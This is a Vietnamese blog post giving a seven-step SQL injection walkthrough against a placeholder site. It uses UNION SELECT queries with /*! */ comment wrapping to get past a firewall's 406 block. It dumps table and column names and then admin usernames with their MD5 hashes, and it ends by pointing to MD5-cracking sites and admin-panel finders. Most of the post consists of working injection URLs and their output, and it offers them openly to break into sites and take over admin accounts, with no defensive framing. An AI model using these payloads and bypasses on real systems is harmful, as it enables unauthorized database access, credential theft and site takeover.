Thêm dấu ‘ vào sau con số của đường link có dạng id=
http://www.domain.com/index.php?do=content&id=1'
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli
Bước 2: Tìm số trường cột
http://www.domain.com/index.php?do=content&id=1 order by 6-- - giao diện site bình thường
http://www.domain.com/index.php?do=content&id=1 order by 7-- - giao diện site thay đổi
Vì vậy, số trường cột là 6
Bước 3: Xác định vị trí trường cột bị lỗi
http://www.domain.com/index.php?do=content&id=-1 UNION SELECT 1,2,3,4,5,6-- -
Đến đây nếu khai thác bình thường sẽ bị chặn lại và xuất hiện 406 Not Acceptable, 80% site bị lỗi này chúng ta có thể bypass thành công bằng cách thêm /*! */ ở ở query “select”, “table_name”, “tables “ và “column_name”.
http://www.domain.com/index.php?do=content&id=-1 UNION /*!SELECT*/ 1,2,3,4,5,6-- -
Ta thấy xuất hiện số 3, nghĩa nghĩa tại vị trí sô 3, trường cột bị lỗi. Vì thế ta sẽ khai thác tại vị trí này.
Lưu ý phải có dấu – sau con số 1 để xuất hiện vị trí trường cột bị lỗi hay còn gọi là số đẹp.
Bước 4: Xuất ra tên các tables trong database
http://www.domain.com/index.php?do=content&id=-1 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(table_name))),4,5,6 from information_schema.tables where table_schema=database()-- -
Đến bước này cũng bị chặn và xuất hiện thông báo tương tự như trên, ta tiếp tục bypass bằng các thêm /*! */ ở table_name và tables
http://www.domain.com/index.php?do=content&id=-1 /*!UNION*/ /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!table_name*/))),4,5,6 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
Thông tin các tables thu được:
admin,baogia,category,danhmuc,news,page,products,tygia
Tables chứa thông tin về username và password là admin. Vì vậy ta sẽ tiếp tục khai thác tables này.
Bước 5: Xuất ra tên các colums chứa username và password
http://www.domain.com/index.php?do=content&id=-1 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6 from information_schema./*!columns*/ where /*!table_schema*/=database() and /*!table_name*/=0x61646d696e-- -
Thông tin các columns trong tables admin thu được:
id,username,password,email
Lưu ý:
- 0x tạm hiểu là dùng để nhận dạng khi sử dụng ở dạng mã hex
- 61646d696e là ký tự admin ở dạng hex.
- Link convert các ký tự sang mã hex:
http://string-functions.com/string-hex.aspx
Bước 6: Xuất ra thông tin của Username và Password
http://www.domain.com/index.php?do=content&id=-1 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(username,0x2f,password))),4,5,6 from admin-- -
Thông tin về username và password được mã hóa md5 thu được:
quyle/dee0266ac3ac3deb0e49a90e595afd64
Bước 7: Crack Password và tìm link admin:
- Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/
Hoặc sử dụng google để tìm kiếm
- Sử dụng các tool để tìm link admin: Havij, Web admin finder
Nguồn: Mr.solein
Nguồn: Mr.solein
Đăng nhận xét Blogger Facebook